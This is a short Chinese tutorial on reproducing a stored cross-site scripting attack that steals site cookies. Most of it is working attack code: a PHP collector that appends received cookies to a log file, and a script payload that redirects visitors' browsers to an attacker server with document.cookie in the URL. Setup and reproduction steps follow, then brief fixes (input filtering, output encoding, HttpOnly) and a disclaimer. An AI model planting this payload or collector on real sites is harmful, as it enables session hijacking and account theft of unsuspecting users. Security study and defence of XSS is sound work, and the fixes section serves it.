存储型跨站获取COOKIE漏洞复现

一、漏洞描述

获取网站cookie

二、漏洞原理

1、服务器后台写入PHP代码

$cookie = $_GET['cookie'];
if($cookie){
        echo ($cookie);
        $log = fopen("/etc/var/www/html/cookie.txt", "a");
        fwrite($log, $cookie ."\n");
        fclose($log);
        echo ($_cookie);
}
else{
       echo'cookie is not ';
}

2、前端写入获取cookie跨站代码

<script>
document.location='http://IP/getCookie.php?cookie='+document.cookie;
</script>

三、环境搭建

接收cookie的服务器

注意，写入cookie.txt的父文件夹一定要有other写入权限。

四、漏洞复现

1、写入获取cookie的js

2、跳转到此界面

3、到服务器查看获取的cookie

五、漏洞修复措施

在输入过滤，在显示的地方做输出编码。

使用一个统一的规则做输出编码

富文本框，使用白名单控制输入。

使用HTTPOnly标志

声明

严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !